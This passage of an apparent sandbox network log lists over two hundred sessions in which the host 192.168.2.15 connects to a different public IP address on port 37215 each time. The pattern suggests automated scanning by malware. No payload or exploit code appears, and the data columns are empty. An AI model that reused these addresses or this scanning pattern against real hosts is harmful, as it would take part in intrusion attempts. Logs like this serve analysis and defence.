                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12061192.168.2.156033437.49.207.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12062192.168.2.154902494.121.98.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12063192.168.2.154025037.160.200.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12064192.168.2.1558902181.138.246.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12065192.168.2.1539494107.76.161.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12066192.168.2.153743837.79.52.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12067192.168.2.1559018181.166.9.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12068192.168.2.1541584181.213.236.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12069192.168.2.1550940156.236.149.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12070192.168.2.1555132181.235.231.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12071192.168.2.1533410156.124.148.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12072192.168.2.1559418122.34.53.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12073192.168.2.154769037.188.51.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12074192.168.2.153854231.39.135.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12075192.168.2.154372631.111.183.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12076192.168.2.1538484157.8.24.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12077192.168.2.155654694.123.114.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12078192.168.2.1543368138.116.204.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12079192.168.2.1534200102.194.35.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12080192.168.2.1538608160.24.129.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12081192.168.2.1560740181.2.117.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12082192.168.2.1547358102.255.229.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12083192.168.2.1541198197.38.1.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12084192.168.2.153746494.172.91.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12085192.168.2.1558534190.169.64.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12086192.168.2.1534738138.112.118.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12087192.168.2.153450831.184.62.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12088192.168.2.1543718222.216.154.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12089192.168.2.1551972121.96.48.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12090192.168.2.155195845.22.13.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12091192.168.2.1553120157.191.72.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12092192.168.2.155663231.253.157.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12093192.168.2.1544860181.178.4.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12094192.168.2.1541826222.17.16.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12095192.168.2.1555708197.79.170.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12096192.168.2.154694431.105.231.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12097192.168.2.1534792197.205.7.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12098192.168.2.1557350181.141.143.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12099192.168.2.155821841.47.157.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12100192.168.2.1543792190.43.237.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12101192.168.2.1540264122.219.148.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12102192.168.2.1535708138.190.134.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12103192.168.2.153399431.14.26.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12104192.168.2.1534282138.221.223.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12105192.168.2.155866031.15.21.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12106192.168.2.1545714102.36.91.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12107192.168.2.153790431.242.189.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12108192.168.2.155798037.5.255.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12109192.168.2.1555006121.11.116.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12110192.168.2.155943831.81.114.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12111192.168.2.154376637.175.103.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12112192.168.2.1557288156.88.185.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12113192.168.2.1556286186.184.106.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12114192.168.2.154890431.247.19.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12115192.168.2.1552576181.148.134.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12116192.168.2.1538678134.140.241.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12117192.168.2.154125445.92.218.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12118192.168.2.1545276102.219.13.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12119192.168.2.1547938190.209.57.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12120192.168.2.1532970197.36.147.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12121192.168.2.1540394181.76.202.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12122192.168.2.1533082157.225.113.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12123192.168.2.154454845.201.35.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12124192.168.2.1544286157.156.155.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12125192.168.2.1545314121.34.35.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12126192.168.2.155123445.33.144.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12127192.168.2.1534138156.238.29.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12128192.168.2.1556456181.66.144.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12129192.168.2.1543780138.10.168.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12130192.168.2.1535154188.81.121.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12131192.168.2.1560212168.237.241.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12132192.168.2.154364645.116.109.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12133192.168.2.1546818186.38.68.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12134192.168.2.154429041.100.110.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12135192.168.2.1552962157.164.142.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12136192.168.2.155209631.138.30.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12137192.168.2.1558334190.43.35.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12138192.168.2.1533006186.252.113.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12139192.168.2.155945241.228.45.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12140192.168.2.1535988122.180.189.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12141192.168.2.155447031.234.148.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12142192.168.2.155783294.255.85.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12143192.168.2.154785431.222.176.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12144192.168.2.154295045.244.146.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12145192.168.2.1557182157.130.214.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12146192.168.2.1542968122.150.191.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12147192.168.2.154034245.99.176.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12148192.168.2.155072237.245.3.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12149192.168.2.154913458.172.199.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12150192.168.2.1536914102.242.64.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12151192.168.2.155081641.166.156.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12152192.168.2.1558928180.253.182.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12153192.168.2.1535316102.22.152.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12154192.168.2.1559712190.102.196.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12155192.168.2.1556430122.153.180.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12156192.168.2.153905445.159.155.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12157192.168.2.155116837.117.106.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12158192.168.2.1538846121.77.165.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12159192.168.2.1547850178.127.204.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12160192.168.2.154242831.132.40.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12161192.168.2.154354431.5.236.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12162192.168.2.1538216122.83.161.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12163192.168.2.153856645.177.162.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12164192.168.2.1543132222.26.202.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12165192.168.2.1535842122.31.255.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12166192.168.2.155626694.35.186.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12167192.168.2.1549546197.217.155.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12168192.168.2.154756645.166.77.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12169192.168.2.1541048102.186.95.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12170192.168.2.155365031.195.217.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12171192.168.2.1550570141.101.70.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12172192.168.2.1544088157.102.71.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12173192.168.2.1547424157.223.150.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12174192.168.2.1534064138.120.50.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12175192.168.2.1535926181.114.227.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12176192.168.2.153831031.230.119.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12177192.168.2.1551656122.223.149.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12178192.168.2.1542064138.164.42.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12179192.168.2.1539344156.239.132.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12180192.168.2.1544080190.51.216.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12181192.168.2.153507894.79.118.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12182192.168.2.1553478138.207.63.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12183192.168.2.1543042157.156.204.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12184192.168.2.1542692157.133.142.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12185192.168.2.155320494.217.194.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12186192.168.2.1554200197.93.11.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12187192.168.2.1550838146.252.102.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12188192.168.2.1534830122.63.176.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12189192.168.2.1545716121.124.5.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12190192.168.2.1534702190.35.125.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12191192.168.2.154917441.236.77.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12192192.168.2.154261445.20.215.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12193192.168.2.156049845.40.41.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12194192.168.2.1537496197.122.148.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12195192.168.2.155772031.88.252.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12196192.168.2.1544160138.149.200.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12197192.168.2.1553402102.124.104.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12198192.168.2.1544618222.135.117.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12199192.168.2.1539068156.232.92.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12200192.168.2.1556218138.21.201.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12201192.168.2.1558440160.58.95.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12202192.168.2.1554958197.215.180.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12203192.168.2.1553598189.40.252.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12204192.168.2.1541390122.90.41.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12205192.168.2.155298445.72.56.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12206192.168.2.1549862222.240.46.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12207192.168.2.1549684222.114.86.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12208192.168.2.155900241.66.138.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12209192.168.2.1559402181.99.196.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12210192.168.2.155269237.226.19.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12211192.168.2.154846694.26.10.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12212192.168.2.1542462190.103.152.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12213192.168.2.1552146181.1.63.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12214192.168.2.155838294.122.79.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12215192.168.2.1538942121.142.188.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12216192.168.2.1550788197.135.56.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12217192.168.2.1544614122.25.227.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12218192.168.2.1533058121.59.65.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12219192.168.2.154403631.169.105.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12220192.168.2.1558266122.8.113.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12221192.168.2.1552182186.56.58.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12222192.168.2.153643231.232.76.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12223192.168.2.1554324102.35.114.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12224192.168.2.154988245.110.123.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12225192.168.2.154033841.105.237.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12226192.168.2.1546108186.30.54.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12227192.168.2.1535326181.188.33.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12228192.168.2.1544336121.105.88.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12229192.168.2.153613494.186.71.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12230192.168.2.1546370197.222.128.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12231192.168.2.155542431.241.75.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12232192.168.2.1537972222.68.124.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12233192.168.2.1542924181.87.32.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12234192.168.2.155194094.167.159.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12235192.168.2.153849894.96.185.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12236192.168.2.154323031.69.22.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12237192.168.2.1551014138.77.34.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12238192.168.2.1541584190.244.2.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12239192.168.2.1548686210.222.138.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12240192.168.2.1560692222.176.230.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12241192.168.2.1545292197.23.69.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12242192.168.2.153331437.173.236.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12243192.168.2.1548546222.140.218.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12244192.168.2.1553284121.12.70.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12245192.168.2.1555662186.122.0.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12246192.168.2.155216437.1.4.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12247192.168.2.1549486138.13.13.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12248192.168.2.154938045.88.177.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12249192.168.2.1547794102.180.105.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12250192.168.2.1546118122.30.79.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12251192.168.2.1535918222.125.122.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12252192.168.2.153880484.144.19.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12253192.168.2.1541138197.210.75.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12254192.168.2.1533346102.120.50.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12255192.168.2.1547822122.47.48.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12256192.168.2.1553888156.30.223.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12257192.168.2.1540288190.235.129.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12258192.168.2.155377241.62.110.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12259192.168.2.1544712138.74.70.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12260192.168.2.1538228197.227.108.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12261192.168.2.154381037.41.83.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12262192.168.2.1543590156.198.255.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12263192.168.2.1540838102.173.45.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12264192.168.2.1546368156.181.51.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12265192.168.2.1533268122.237.156.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12266192.168.2.153763037.242.208.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12267192.168.2.1554196121.59.151.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12268192.168.2.154557631.220.86.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12269192.168.2.1543278122.194.116.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12270192.168.2.1542046102.213.97.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12271192.168.2.1545448197.246.198.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12272192.168.2.154897437.91.32.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12273192.168.2.1560700222.94.219.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12274192.168.2.154352231.170.110.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12275192.168.2.156099231.194.128.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12276192.168.2.1545204157.71.232.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12277192.168.2.1546170156.136.94.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12278192.168.2.1559696156.45.245.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
